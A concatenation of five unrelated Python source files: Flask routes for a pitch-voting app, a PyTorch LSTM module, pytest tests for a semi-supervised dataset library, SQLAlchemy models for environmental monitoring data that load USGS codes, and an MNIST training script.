    # every request raised NameError. Query the pitches like index().
    pitchs = Pitch.query.order_by('posted').all()
    return render_template('index.html', pitchs=pitchs)
@main.route("/about")
def about():
    """Render the static About page."""
    page_title = 'About'
    return render_template('about.html', title=page_title)
# Dev-server entry point for the module-level `app` defined above.
if __name__ =='__main__':
    app.run(debug=True)
# @main.route("/register", methods=['GET', 'POST'])
# def register():
# # if request.method == 'POST'
# # return do_login()
# # else:
# # return LoginForm()
# form = RegisterForm()
# return render_template('register.html', title='Register', forms=forms )
# @main.route("/login")
# def login():
# form = LoginForm()
# return render_template('login.html', title='Login' , forms=forms)
# @main.route('/categories/<int:id>')
# def category(id):
# category = PitchCategory.query.get(id)
# if category is None:
# abort(404)
# pitches=Pitch.get_pitches(id)
# return render_template('category.html', pitches=pitches, category=category)
# @main.route('/add/category', methods=['GET','POST'])
# @login_required
# def new_category():
# """
# View new group route function that returns a page with a form to create a category
# """
# form = CategoryForm()
# if form.validate_on_submit():
# name = form.name.data
# new_category = PitchCategory(name = name)
# new_category.save_category()
# return redirect(url_for('.index'))
# title = 'New category'
# return render_template('new_category.html', category_form = form, title = title)
#view single pitch alongside its comments
# @main.route('/view_pitch/<int:id>', methods=['GET', 'POST'])
# @login_required
# def view_pitch(id):
# """
# Function the returns a single pitch for a comment to be added
# """
# all_category = PitchCategory.get_categories()
# pitches = Pitch.query.get(id)
# # pitches = Pitch.query.filter_by(id=id).all()
# if pitches is None:
# abort(404)
# comment = Comments.get_comments(id)
# count_likes = Votes.query.filter_by(pitches_id=id, vote=1).all()
# count_dislikes = Votes.query.filter_by(pitches_id=id, vote=2).all()
# return render_template('view-pitch.html', pitches = pitches, comment = comment, count_likes=len(count_likes), count_dislikes=len(count_dislikes), category_id = id, categories=all_category)
#adding a comment
# @main.route('/write_comment/<int:id>', methods=['GET', 'POST'])
# @login_required
# def post_comment(id):
# """
# Function to post comments
# """
# form = CommentForm()
# title = 'post comment'
# pitches = Pitch.query.filter_by(id=id).first()
# if pitches is None:
# abort(404)
# if form.validate_on_submit():
# opinion = form.opinion.data
# new_comment = Comments(opinion = opinion, user_id = current_user.id, pitches_id = pitches.id)
# new_comment.save_comment()
# return redirect(url_for('.view_pitch', id = pitches.id))
# return render_template('post_comment.html', comment_form = form, title = title)
#Routes upvoting/downvoting pitches
# @main.route('/pitch/upvote/<int:id>&<int:vote_type>')
# @login_required
# def upvote(id,vote_type):
# """
# View function that adds one to the vote_number column in the votes table
# """
# # Query for user
# votes = Votes.query.filter_by(user_id=current_user.id).all()
# print(f'The new vote is {votes}')
# to_str=f'{vote_type}:{current_user.id}:{id}'
# print(f'The current vote is {to_str}')
# if not votes:
# new_vote = Votes(vote=vote_type, user_id=current_user.id, pitches_id=id)
# new_vote.save_vote()
# # print(len(count_likes))
# print('YOU HAVE VOTED')
# for vote in votes:
# if f'{vote}' == to_str:
# print('YOU CANNOT VOTE MORE THAN ONCE')
# break
# else:
# new_vote = Votes(vote=vote_type, user_id=current_user.id, pitches_id=id)
# new_vote.save_vote()
# print('YOU HAVE VOTED')
# break
# # count_likes = Votes.query.filter_by(pitches_id=id, vote=1).all()
# # upvotes=len(count_likes)
# # count_dislikes = Votes.query.filter_by(pitches_id=id, vote=2).all()
# return redirect(url_for('.view_pitch', id=id))
|
# Copyright (c) 2019, Myrtle Software Limited. All rights reserved.
# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
from typing import Optional, Tuple
def rnn(rnn, input_size, hidden_size, num_layers, norm=None,
        forget_gate_bias=1.0, dropout=0.0, **kwargs):
    """Factory for the model's RNN module.

    Args:
        rnn: RNN type; only "lstm" is supported.
        input_size: See `torch.nn.LSTM`.
        hidden_size: See `torch.nn.LSTM`.
        num_layers: See `torch.nn.LSTM`.
        norm: normalization scheme; only None is supported.
        forget_gate_bias: total initial forget-gate bias per layer and
            direction (see `LstmDrop`).
        dropout: See `torch.nn.LSTM`.
        **kwargs: forwarded to `LstmDrop`.

    Returns:
        An `LstmDrop` module.

    Raises:
        ValueError: if `rnn` is not "lstm" or `norm` is not None.
    """
    if rnn != "lstm":
        raise ValueError(f"Unknown rnn={rnn}")
    if norm not in [None]:
        raise ValueError(f"unknown norm={norm}")
    # The guards above leave "lstm"/no-norm as the only possibility, so
    # the original trailing `if rnn == "lstm"` check (whose false branch
    # implicitly returned None) was redundant and has been removed.
    return LstmDrop(
        input_size=input_size,
        hidden_size=hidden_size,
        num_layers=num_layers,
        dropout=dropout,
        forget_gate_bias=forget_gate_bias,
        **kwargs
    )
class LstmDrop(torch.nn.Module):
    """LSTM wrapper with custom forget-gate bias init and optional
    in-place dropout applied to the output sequence."""

    def __init__(self, input_size, hidden_size, num_layers, dropout, forget_gate_bias,
                 **kwargs):
        """Returns an LSTM with forget gate bias init to `forget_gate_bias`.

        Args:
            input_size: See `torch.nn.LSTM`.
            hidden_size: See `torch.nn.LSTM`.
            num_layers: See `torch.nn.LSTM`.
            dropout: See `torch.nn.LSTM`.
            forget_gate_bias: For each layer and each direction, the total value of
                to initialise the forget gate bias to.

        Returns:
            A `torch.nn.LSTM`.
        """
        super(LstmDrop, self).__init__()
        self.lstm = torch.nn.LSTM(
            input_size=input_size,
            hidden_size=hidden_size,
            num_layers=num_layers,
            dropout=dropout,
        )
        if forget_gate_bias is not None:
            # PyTorch packs LSTM biases in [i, f, g, o] order, so the
            # forget-gate slice is [hidden_size:2*hidden_size]. bias_ih
            # carries the full target value and bias_hh is zeroed, making
            # the *total* forget-gate bias equal forget_gate_bias.
            for name, v in self.lstm.named_parameters():
                if "bias_ih" in name:
                    bias = getattr(self.lstm, name)
                    bias.data[hidden_size:2 * hidden_size].fill_(forget_gate_bias)
                if "bias_hh" in name:
                    bias = getattr(self.lstm, name)
                    bias.data[hidden_size:2 * hidden_size].fill_(0)
        if dropout:
            self.inplace_dropout = torch.nn.Dropout(dropout, inplace=True)
        else:
            # BUG FIX: this attribute was misspelled `inplace_droput`, so
            # forward() raised AttributeError whenever dropout == 0.
            self.inplace_dropout = None

    def forward(self, x: torch.Tensor,
                h: Optional[Tuple[torch.Tensor, torch.Tensor]] = None):
        """Run the LSTM; apply in-place dropout to outputs if configured."""
        x, h = self.lstm(x, h)
        if self.inplace_dropout is not None:
            self.inplace_dropout(x.data)
        return x, h
class StackTime(torch.nn.Module):
    """Stack `factor` consecutive time frames into one wider frame.

    Input is (T, B, U); output is (ceil(T/factor), B, U*factor), with the
    time axis zero-padded to a multiple of `factor` first. Sequence lengths
    are reduced accordingly.
    """
    __constants__ = ["factor"]

    def __init__(self, factor):
        super().__init__()
        self.factor = int(factor)

    def forward(self, x, x_lens):
        # Work batch-first: (T, B, U) -> (B, T, U).
        batch_first = torch.transpose(x, 0, 1)
        b, t, u = batch_first.shape
        # Zero-pad time to the next multiple of the stacking factor.
        pad = torch.zeros(b, (-t) % self.factor, u,
                          dtype=batch_first.dtype, device=batch_first.device)
        padded = torch.cat([batch_first, pad], 1)
        # Fold each group of `factor` frames into the feature dimension.
        stacked = torch.reshape(
            padded, [b, padded.shape[1] // self.factor, u * self.factor])
        out = torch.transpose(stacked, 0, 1)
        out_lens = torch.ceil(x_lens.float() / self.factor).int()
        return out, out_lens
|
from pytest import raises
import pytest
def test_register():
    """Datasets built via the registry yield correctly shaped batches."""
    from DeSSL.data import SEMI_DATASET_REGISTRY
    from DeSSL import loadding_config

    args = loadding_config('config/base.yml').parse_args([])
    builder = SEMI_DATASET_REGISTRY('semi_cifar10')
    semi_cifar = builder(args.root, args.num_labels_per_class)
    train_loader, test_loader, classes = semi_cifar(
        args.batch_size, num_workers=args.num_workers)

    for labeled, unlabeled in train_loader:
        labeled_images, _ = labeled
        unlabeled_images, _ = unlabeled
        assert list(labeled_images.shape) == [args.batch_size, 3, 32, 32]
        break
    for images, _ in test_loader:
        assert list(images.shape) == [args.batch_size * 2, 3, 32, 32]
        break
    assert classes == args.num_classes
def test_data():
    """Both the explicit SemiDataset and the semi_cifar10 shortcut behave alike."""
    from DeSSL.data import SemiDataset, semi_cifar10
    from torchvision.datasets import CIFAR10
    from torchvision import transforms as tf
    from DeSSL import loadding_config

    args = loadding_config('config/base.yml').parse_args([])
    labeled_shape = [args.batch_size, 3, 32, 32]
    test_shape = [args.batch_size * 2, 3, 32, 32]

    def check(dataset):
        # One labeled/unlabeled training batch and one test batch suffice.
        train_loader, test_loader, classes = dataset(
            args.batch_size, num_workers=args.num_workers)
        for labeled, unlabeled in train_loader:
            labeled_images, _ = labeled
            unlabeled_images, _ = unlabeled
            assert list(labeled_images.shape) == labeled_shape
            break
        for images, _ in test_loader:
            assert list(images.shape) == test_shape
            break
        assert classes == args.num_classes

    check(SemiDataset(args.root, args.num_labels_per_class, CIFAR10,
                      args.num_classes, tf.ToTensor(), tf.ToTensor(), tf.ToTensor()))
    check(semi_cifar10(args.root, args.num_labels_per_class))
def test_include_labeled_data():
    """include_labeled_data controls whether labeled samples stay in the unlabeled pool."""
    from DeSSL.data import SemiDataset
    from torchvision.datasets import MNIST
    from torchvision import transforms as tf
    from DeSSL import loadding_config

    args = loadding_config('config/base.yml').parse_args([])
    full_mnist = MNIST(args.root)
    transforms = (tf.ToTensor(), tf.ToTensor(), tf.ToTensor())

    # Default: the unlabeled pool is the whole dataset.
    inclusive = SemiDataset(args.root, args.num_labels_per_class, MNIST,
                            args.num_classes, *transforms)
    assert len(inclusive.unlabel_dataset) == len(full_mnist)

    # Excluded: labeled + unlabeled partition the whole dataset.
    exclusive = SemiDataset(args.root, args.num_labels_per_class, MNIST,
                            args.num_classes, *transforms,
                            include_labeled_data=False)
    assert len(exclusive.unlabel_dataset) + \
        len(exclusive.label_dataset) == len(full_mnist)
def test_import_data():
    """These names must not be importable from the package root."""
    with pytest.raises(ImportError):
        from DeSSL import SemiDataset, semi_mnist
|
<reponame>jentjr/envirobase
import json
from . import db
import pandas as pd
from datetime import datetime
from geoalchemy2 import functions
from geoalchemy2.types import Geometry
from flask import current_app, request, url_for
from .errors import AlreadyExistsError
class BaseExtension(db.MapperExtension):
    """Base extension for all entities.

    NOTE(review): MapperExtension was deprecated/removed in newer SQLAlchemy
    releases in favour of mapper events — confirm the pinned version supports it.
    """
    def before_insert(self, mapper, connection, instance):
        # Stamp creation time just before the INSERT is emitted.
        instance.created_on = datetime.now()
    def before_update(self, mapper, connection, instance):
        # Stamp modification time just before each UPDATE is emitted.
        instance.updated_on = datetime.now()
class BaseEntity(object):
    """Mixin adding audit timestamp columns maintained by BaseExtension."""
    __mapper_args__ = {"extension": BaseExtension()}
    # Filled automatically by BaseExtension.before_insert / before_update.
    created_on = db.Column(db.DateTime)
    updated_on = db.Column(db.DateTime)
class Facility(db.Model, BaseEntity):
    """A physical site that owns storage tanks and waste units."""
    __tablename__ = "facility"
    facility_id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.Text, nullable=False, unique=True)
    type = db.Column(db.Text)
    address = db.Column(db.Text)
    city = db.Column(db.Text)
    state = db.Column(db.CHAR(2))
    zipcode = db.Column(db.String)
    longitude = db.Column(db.Float, nullable=True)
    latitude = db.Column(db.Float, nullable=True)
    # PostGIS point derived from longitude/latitude (see update_geometries).
    geometry = db.Column(Geometry(geometry_type="POINT", srid=4326))
    storage_tank = db.relationship("StorageTank", back_populates="facility")
    waste_unit = db.relationship("WasteUnit", back_populates="facility")
    def __repr__(self):
        return f"Facility('{self.facility_id}','{self.name}', '{self.address}', '{self.city}','{self.state}', '{self.zipcode}')"
    @classmethod
    def add_facility(cls, name, address, city, state, zipcode, longitude, latitude):
        """Add a new facility in the database."""
        # WKT point in lon/lat order, matching the column's SRID 4326.
        geometry = "POINT({} {})".format(longitude, latitude)
        facility = Facility(
            name=name,
            address=address,
            city=city,
            state=state,
            zipcode=zipcode,
            longitude=longitude,
            latitude=latitude,
            geometry=geometry,
        )
        db.session.add(facility)
        db.session.commit()
    @classmethod
    def update_geometries(cls):
        """Using each facility's longitude and latitude, add geometry data to db."""
        facilities = Facility.query.all()
        for facility in facilities:
            point = "POINT({} {})".format(facility.longitude, facility.latitude)
            facility.geometry = point
        db.session.commit()
    def to_json(self):
        """Serialize this facility to a JSON-ready dict (geometry omitted)."""
        json_facility = {
            "url": url_for("api.get_facility", facility_id=self.facility_id),
            "name": self.name,
            "address": self.address,
            "city": self.city,
            "state": self.state,
            "zipcode": self.zipcode,
            "longitude": self.longitude,
            "latitude": self.latitude,
        }
        return json_facility
    @staticmethod
    def from_json(json_facility):
        """Build a Facility from a JSON dict; `name` is required.

        NOTE(review): ValidationError is not imported in this module (only
        AlreadyExistsError is) — confirm where it is defined.
        """
        name = json_facility.get("name")
        address = json_facility.get("address")
        city = json_facility.get("city")
        state = json_facility.get("state")
        zipcode = json_facility.get("zipcode")
        longitude = json_facility.get("longitude")
        latitude = json_facility.get("latitude")
        if name is None or name == "":
            raise ValidationError("Facility must have a name")
        return Facility(
            name=name,
            address=address,
            city=city,
            state=state,
            zipcode=zipcode,
            longitude=longitude,
            latitude=latitude,
            created_on=datetime.utcnow()
            # geometry = "POINT({} {})".format(longitude, latitude)
        )
class WasteUnit(db.Model, BaseEntity):
    """Base table for waste units (landfills, impoundments) at a facility.

    Polymorphic base: subclasses discriminate on `unit_type`.
    """
    __tablename__ = "waste_unit"
    # A unit name must be unique within a facility.
    __table_args__ = (db.UniqueConstraint("name", "facility_id"),)
    unit_id = db.Column(db.Integer, primary_key=True)
    facility_id = db.Column(db.Integer, db.ForeignKey("facility.facility_id"))
    name = db.Column(db.String(64), nullable=False)
    constructed_date = db.Column(db.Date)
    geometry = db.Column(Geometry(geometry_type="POLYGON", srid=4326))
    # Discriminator column for the polymorphic hierarchy.
    unit_type = db.Column(db.String(12), nullable=False)
    facility = db.relationship("Facility", back_populates="waste_unit")
    __mapper_args__ = {
        "polymorphic_identity": "waste_unit",
        "polymorphic_on": unit_type,
    }
    def __repr__(self):
        return f"WasteUnit('{self.name}')"
    def to_json(self):
        """Serialize the common waste-unit fields to a JSON-ready dict."""
        json_waste_unit = {
            "url": url_for("api.get_waste_unit", unit_id=self.unit_id),
            "name": self.name,
            "constructed_date": self.constructed_date,
            "unit_type": self.unit_type,
        }
        return json_waste_unit
class Landfill(WasteUnit, BaseEntity):
    """Landfill subtype of WasteUnit (joined-table inheritance).

    NOTE(review): joined-table inheritance normally needs a pk column that is
    a FK to waste_unit.unit_id in this table — confirm the mapping works.
    """
    __tablename__ = "landfill"
    permit_id = db.Column(db.String(24))
    __mapper_args__ = {"polymorphic_identity": "landfill"}
    def __repr__(self):
        return f"Landfill('{self.name}')"
    def to_json(self):
        # Minimal representation; common fields live on WasteUnit.to_json.
        json_landfill = {
            "url": url_for("api.get_landfill", unit_id=self.unit_id),
            "name": self.name,
        }
        return json_landfill
class Impoundment(WasteUnit, BaseEntity):
    """Surface impoundment subtype of WasteUnit (joined-table inheritance).

    NOTE(review): as with Landfill, this table declares no pk/FK column —
    confirm the inheritance mapping works as intended.
    """
    __tablename__ = "impoundment"
    dam_id = db.Column(db.String(24))
    hazard_class = db.Column(db.Text)
    __mapper_args__ = {"polymorphic_identity": "impoundment"}
    def __repr__(self):
        return f"Impoundment('{self.dam_id}', '{self.name}', '{self.hazard_class}')"
    def to_json(self):
        # Minimal representation; common fields live on WasteUnit.to_json.
        json_impoundment = {
            "url": url_for("api.get_impoundment", unit_id=self.unit_id),
            "name": self.name,
        }
        return json_impoundment
class StorageTank(db.Model, BaseEntity):
    """Base class for UndergroundStorageTank and AbovegroundStorageTank classes using Joined Table Inheritance. When StorageTank is queried only columns in this class are returned."""
    __tablename__ = "storage_tank"
    # A registration id must be unique within a facility.
    __table_args__ = (db.UniqueConstraint("tank_registration_id", "facility_id"),)
    tank_id = db.Column(db.Integer, primary_key=True)
    tank_registration_id = db.Column(db.String(12))
    facility_id = db.Column(db.Integer, db.ForeignKey("facility.facility_id"))
    date_installed = db.Column(db.Date)
    date_removed = db.Column(db.Date)
    capacity = db.Column(db.Integer)
    stored_substance = db.Column(db.String(64))
    status = db.Column(db.String(10))
    longitude = db.Column(db.Float)
    latitude = db.Column(db.Float)
    geometry = db.Column(Geometry(geometry_type="POINT", srid=4326))
    # Discriminator: "ust" or "ast" (see subclasses).
    tank_type = db.Column(db.String(3), nullable=False)
    facility = db.relationship("Facility", back_populates="storage_tank")
    __mapper_args__ = {
        "polymorphic_identity": "storage_tank",
        "polymorphic_on": tank_type,
    }
    def __repr__(self):
        return f"StorageTank('{self.tank_id}', '{self.tank_type}', '{self.stored_substance}', '{self.status}')"
    def to_json(self):
        """Serialize the common tank fields to a JSON-ready dict."""
        json_storage_tank = {
            "url": url_for("api.get_storage_tank", tank_id=self.tank_id),
            "facility": self.facility.name,
            "tank_registration_id": self.tank_registration_id,
            "capacity": self.capacity,
            "stored_substance": self.stored_substance,
            "status": self.status,
            "tank_type": self.tank_type,
            "longitude": self.longitude,
            "latitude": self.latitude,
        }
        return json_storage_tank
    @staticmethod
    def from_json(json_storage_tank):
        """Build a StorageTank from a JSON dict; `facility_id` is required.

        NOTE(review): ValidationError is not imported in this module —
        confirm where it is defined.
        """
        facility_id = json_storage_tank.get("facility_id")
        tank_registration_id = json_storage_tank.get("tank_registration_id")
        capacity = json_storage_tank.get("capacity")
        stored_substance = json_storage_tank.get("stored_substance")
        status = json_storage_tank.get("status")
        tank_type = json_storage_tank.get("tank_type")
        longitude = json_storage_tank.get("longitude")
        latitude = json_storage_tank.get("latitude")
        if facility_id is None or facility_id == "":
            raise ValidationError("Tank must be associated with a Facility")
        return StorageTank(
            facility_id=facility_id,
            tank_registration_id=tank_registration_id,
            capacity=capacity,
            stored_substance=stored_substance,
            status=status,
            tank_type=tank_type,
            longitude=longitude,
            latitude=latitude,
            created_on=datetime.utcnow()
            # geometry = "POINT({} {})".format(longitude, latitude)
        )
class UndergroundStorageTank(StorageTank, BaseEntity):
    """Subclass to StorageTank with Joined Table Inheritance. When UndergroundStorageTank is queried all columns from StorageTank are inherited."""
    __tablename__ = "ust"
    __mapper_args__ = {"polymorphic_identity": "ust"}
    # Tank construction details.
    tank_double_wall = db.Column(db.Boolean)
    inner_tank_material = db.Column(db.Text)
    outer_tank_material = db.Column(db.Text)
    tank_leak_detection = db.Column(db.Text)
    tank_corrosion_protection = db.Column(db.Text)
    tank_monitoring_system = db.Column(db.Text)
    # Piping details.
    piping_double_wall = db.Column(db.Boolean)
    piping_type = db.Column(db.Text)  # Pressurized or suction
    inner_pipe_material = db.Column(db.Text)
    outer_pipe_material = db.Column(db.Text)
    piping_corrosion_protection = db.Column(db.Text)
    spill_protection = db.Column(db.Text)
    overflow_protection = db.Column(db.Text)
    def __repr__(self):
        return f"UndergroundStorageTank('{self.tank_id}', '{self.tank_type}', '{self.stored_substance}', '{self.status}')"
    def to_json(self):
        # Minimal representation; common fields live on StorageTank.to_json.
        json_ust = {
            "url": url_for("api.get_ust", tank_id=self.tank_id),
            "capacity": self.capacity,
            "stored_substance": self.stored_substance,
        }
        return json_ust
class AbovegroundStorageTank(StorageTank, BaseEntity):
    """Subclass to StorageTank with Joined Table Inheritance. When AbovegroundStorageTank is queried all columns from StorageTank are inherited."""
    __tablename__ = "ast"
    __mapper_args__ = {"polymorphic_identity": "ast"}
    def __repr__(self):
        return f"AbovegroundStorageTank('{self.tank_id}', '{self.tank_type}', '{self.stored_substance}', '{self.status}')"
    def to_json(self):
        # Minimal representation; common fields live on StorageTank.to_json.
        json_ast = {
            "url": url_for("api.get_ast", tank_id=self.tank_id),
            "capacity": self.capacity,
            "stored_substance": self.stored_substance,
        }
        return json_ast
class MediumCode(db.Model, BaseEntity):
    """USGS sample-medium codes; populated by _insert_medium_codes()."""
    __tablename__ = "medium_code"
    medium_cd = db.Column(db.String(3), primary_key=True)
    medium_name = db.Column(db.String(64))
    medium_description = db.Column(db.Text)
    legacy_cd = db.Column(db.CHAR(1))
    def __init__(self, **kwargs):
        # No extra initialisation; delegates to the declarative base.
        super(MediumCode, self).__init__(**kwargs)
def _insert_medium_codes():
    """Inserts USGS Medium Codes. If the codes have already been entered, an error is thrown."""
    if MediumCode.query.first():
        raise AlreadyExistsError("Medium Codes have already been entered.")
    # Scrape the reference table from the USGS help site; keep codes as str.
    source_url = "https://help.waterdata.usgs.gov/medium_cd"
    codes = pd.read_html(source_url, header=0, converters={0: str})[0]
    column_map = {
        "Medium Code": "medium_cd",
        "Medium Name": "medium_name",
        "Medium Description": "medium_description",
        "Medium Legacy Code": "legacy_cd",
    }
    codes = codes.rename(index=str, columns=column_map)
    codes.to_sql("medium_code", con=db.engine, if_exists="append", index=False)
class SampleParameter(db.Model, BaseEntity):
    """USGS analyte parameter codes; populated by _insert_param_codes()."""
    __tablename__ = "sample_parameter"
    __table_args__ = (
        # Parameter codes are exactly five digits (USGS convention).
        db.CheckConstraint(
            "param_cd ~ similar_escape('[[:digit:]]{5}'::text, NULL::text)"
        ),
    )
    param_cd = db.Column(db.CHAR(5), primary_key=True)
    group_name = db.Column(db.Text)
    description = db.Column(db.Text)
    epa_equivalence = db.Column(db.Text)
    statistical_basis = db.Column(db.Text)
    time_basis = db.Column(db.Text)
    weight_basis = db.Column(db.Text)
    particle_size_basis = db.Column(db.Text)
    sample_fraction = db.Column(db.Text)
    temperature_basis = db.Column(db.Text)
    casrn = db.Column(db.Text)
    srsname = db.Column(db.Text)
    parameter_unit = db.Column(db.Text)
    def __init__(self, **kwargs):
        # No extra initialisation; delegates to the declarative base.
        super(SampleParameter, self).__init__(**kwargs)
def _insert_param_codes():
    """Inserts USGS Parameter Codes. If the codes have already been entered, an error is thrown."""
    if SampleParameter.query.first():
        raise AlreadyExistsError("Parameter Codes have already been entered.")
    # Scrape the full parameter-code table (all groups); keep codes as str.
    source_url = "https://help.waterdata.usgs.gov/parameter_cd?group_cd=%"
    codes = pd.read_html(source_url, header=0, converters={0: str})[0]
    column_map = {
        "Parameter Code": "param_cd",
        "Group Name": "group_name",
        "Parameter Name/Description": "description",
        "Epa equivalence": "epa_equivalence",
        "Result Statistical Basis": "statistical_basis",
        "Result Time Basis": "time_basis",
        "Result Weight Basis": "weight_basis",
        "Result Particle Size Basis": "particle_size_basis",
        "Result Sample Fraction": "sample_fraction",
        "Result Temperature Basis": "temperature_basis",
        "CASRN": "casrn",
        "SRSName": "srsname",
        "Parameter Unit": "parameter_unit",
    }
    codes = codes.rename(index=str, columns=column_map)
    codes.to_sql(
        "sample_parameter", con=db.engine, if_exists="append", index=False
    )
class SampleId(db.Model, BaseEntity):
    """A sampling location belonging to a facility (polymorphic base, e.g. Well)."""
    __tablename__ = "sample_id"
    # A sample id must be unique within a facility.
    __table_args__ = (db.UniqueConstraint("sample_id", "facility_id"),)
    sample_id = db.Column(db.Integer, primary_key=True)
    facility_id = db.Column(db.Integer, db.ForeignKey("facility.facility_id"))
    sample_name = db.Column(db.Text)
    description = db.Column(db.Text)
    longitude = db.Column(db.Float, nullable=True)
    latitude = db.Column(db.Float, nullable=True)
    geometry = db.Column(Geometry(geometry_type="POINT", srid=4326))
    # Discriminator column for the polymorphic hierarchy.
    sample_type = db.Column(db.String(24))
    facility = db.relationship("Facility")
    __mapper_args__ = {
        "polymorphic_identity": "sample_id",
        "polymorphic_on": sample_type,
    }
    def __repr__(self):
        return f"SampleId('{self.sample_id}', '{self.facility.name}', '{self.sample_type}')"
    def to_json(self):
        """Serialize this sample location to a JSON-ready dict."""
        # NOTE(review): the url_for keyword 'sample_id_id' looks like a typo —
        # confirm against the api.get_sample_id route signature.
        json_sample_location = {
            "url": url_for("api.get_sample_id", sample_id_id=self.sample_id),
            "facility": self.facility.name,
            "sample_id": self.sample_id,
            "sample_type": self.sample_type,
        }
        # BUG FIX: previously returned the undefined name 'json_sample_id',
        # raising NameError on every call.
        return json_sample_location
    @staticmethod
    def from_json(json_sample_location):
        """Build a SampleId from a JSON dict; `sample_id` is required.

        NOTE(review): ValidationError is not imported in this module —
        confirm where it is defined.
        """
        facility = json_sample_location.get("facility.name")
        sample_id = json_sample_location.get("sample_id")
        sample_type = json_sample_location.get("sample_type")
        # BUG FIX: the guard tested the undefined name 'location_id'
        # (NameError); it must validate the extracted sample_id instead.
        if sample_id is None or sample_id == "":
            raise ValidationError("Sample does not have an ID")
        return SampleId(sample_id=sample_id, sample_type=sample_type)
class Boring(db.Model, BaseEntity):
    """A drilled boring; referenced by Well via boring_id."""
    __tablename__ = "boring"
    boring_id = db.Column(db.Text, primary_key=True)
    # Drilling start/end dates.
    start_date = db.Column(db.Date)
    end_date = db.Column(db.Date)
class Well(SampleId, BaseEntity):
    """Monitoring-well subtype of SampleId with construction details.

    NOTE(review): __repr__ says 'MonitoringWell' while the class is Well —
    confirm the intended display name.
    """
    __tablename__ = "well"
    __mapper_args__ = {"polymorphic_identity": "monitoring_well"}
    well_id = db.Column(db.Text)
    boring_id = db.Column(db.Text, db.ForeignKey("boring.boring_id"))
    well_type = db.Column(db.String(10))
    installation_date = db.Column(db.Date)
    abandoned_date = db.Column(db.Date)
    # Construction depths/elevations (units not declared in schema).
    top_riser = db.Column(db.Float)
    top_bent_seal = db.Column(db.Float)
    top_gravel_pack = db.Column(db.Float)
    top_screen = db.Column(db.Float)
    bottom_screen = db.Column(db.Float)
    bottom_well = db.Column(db.Float)
    bottom_gravel_pack = db.Column(db.Float)
    bottom_boring = db.Column(db.Float)
    # Construction material descriptions.
    grout_seal_desc = db.Column(db.Text)
    bent_seal_desc = db.Column(db.Text)
    screen_type = db.Column(db.Text)
    gravel_pack_desc = db.Column(db.Text)
    riser_pipe_desc = db.Column(db.Text)
    spacer_depths = db.Column(db.Text)
    notes = db.Column(db.Text)
    boring = db.relationship("Boring")
    def __repr__(self):
        return f"MonitoringWell('{self.well_id}')"
    def to_json(self):
        # Minimal representation; common fields live on SampleId.to_json.
        json_monitoring_well = {
            "url": url_for("api.get_monitoring_well", well_id=self.well_id),
            "top_screen": self.top_screen,
            "bottom_screen": self.bottom_screen,
        }
        return json_monitoring_well
class SampleResult(db.Model, BaseEntity):
    """A single laboratory analysis result for a sample."""
    __tablename__ = "sample_result"
    __table_args__ = (
        # One row per unique lab/sample/date/parameter/value combination.
        db.UniqueConstraint(
            "lab_id", "sample_id", "sample_date", "param_cd", "analysis_result"
        ),
        # Parameter codes are exactly five digits (USGS convention).
        db.CheckConstraint(
            "param_cd ~ similar_escape('[[:digit:]]{5}'::text, NULL::text)"
        ),
    )
    result_id = db.Column(db.Integer, primary_key=True)
    lab_id = db.Column(db.Text)
    facility_id = db.Column(db.Integer, db.ForeignKey("facility.facility_id"))
    sample_id = db.Column(db.Integer, db.ForeignKey("sample_id.sample_id"))
    param_cd = db.Column(db.CHAR(5), db.ForeignKey("sample_parameter.param_cd"))
    medium_cd = db.Column(db.String(3), db.ForeignKey("medium_code.medium_cd"))
    sample_date = db.Column(db.Date, nullable=False)
    sample_time = db.Column(db.Time, nullable=True)
    prep_method = db.Column(db.Text)
    analysis_method = db.Column(db.Text, nullable=True)
    analysis_flag = db.Column(db.CHAR(1), nullable=True)
    analysis_result = db.Column(db.Float, nullable=True)
    analysis_unit = db.Column(db.Text, nullable=False)
    detection_limit = db.Column(db.Float)
    reporting_limit = db.Column(db.Float)
    analysis_qualifier = db.Column(db.CHAR(1))
    disclaimer = db.Column(db.Text)
    analysis_date = db.Column(db.DateTime)
    order_comment = db.Column(db.Text)
    analysis_comment = db.Column(db.Text)
    sample = db.relationship("SampleId")
    medium_code = db.relationship("MediumCode")
    sample_parameter = db.relationship("SampleParameter")
    facility = db.relationship("Facility")
    def __repr__(self):
        return f"SampleResult('{self.result_id}')"
    def to_json(self):
        # Minimal representation: url + lab id only.
        json_sample_result = {
            "url": url_for("api.get_sample_result", result_id=self.result_id),
            "lab_id": self.lab_id,
        }
        return json_sample_result
|
# -*- coding: utf-8 -*-
import os
import numpy as np
from sklearn.datasets import fetch_mldata
import npdl
def get_data():
    """Download MNIST and return (n_classes, X_train, y_train).

    NOTE(review): fetch_mldata was removed from scikit-learn (0.22+) —
    confirm the pinned sklearn version still provides it.
    """
    print("loading data, please wait ...")
    data_home = os.path.join(os.path.dirname(__file__), './data')
    mnist = fetch_mldata('MNIST original', data_home=data_home)
    print('data loading is done ...')
    # Scale pixels to [0, 1].
    features = mnist.data / 255.0
    labels = mnist.target
    return np.unique(labels).size, features, labels
def main(max_iter):
    """Train a 200-unit ReLU MLP on MNIST with plain SGD."""
    n_classes, X_train, y_train = get_data()

    print("building model ...")
    model = npdl.Model()
    model.add(npdl.layers.Dense(n_out=200, n_in=784, activation=npdl.activations.ReLU()))
    model.add(npdl.layers.Dense(n_out=n_classes, activation=npdl.activations.Softmax()))
    model.compile(loss=npdl.objectives.SCCE(), optimizer=npdl.optimizers.SGD())

    print("train model ... ")
    one_hot_targets = npdl.utils.data.one_hot(y_train)
    model.fit(X_train, one_hot_targets, max_iter=max_iter, validation_split=0.1)
def main2(max_iter):
    """Train the 200-unit MLP on MNIST with the Momentum optimizer."""
    n_classes, X_train, y_train = get_data()

    print("building model ...")
    model = npdl.Model()
    model.add(npdl.layers.Dense(n_out=200, n_in=784, activation=npdl.activations.ReLU()))
    model.add(npdl.layers.Dense(n_out=n_classes, activation=npdl.activations.Softmax()))
    model.compile(loss=npdl.objectives.SCCE(), optimizer=npdl.optimizers.Momentum())

    print("train model ... ")
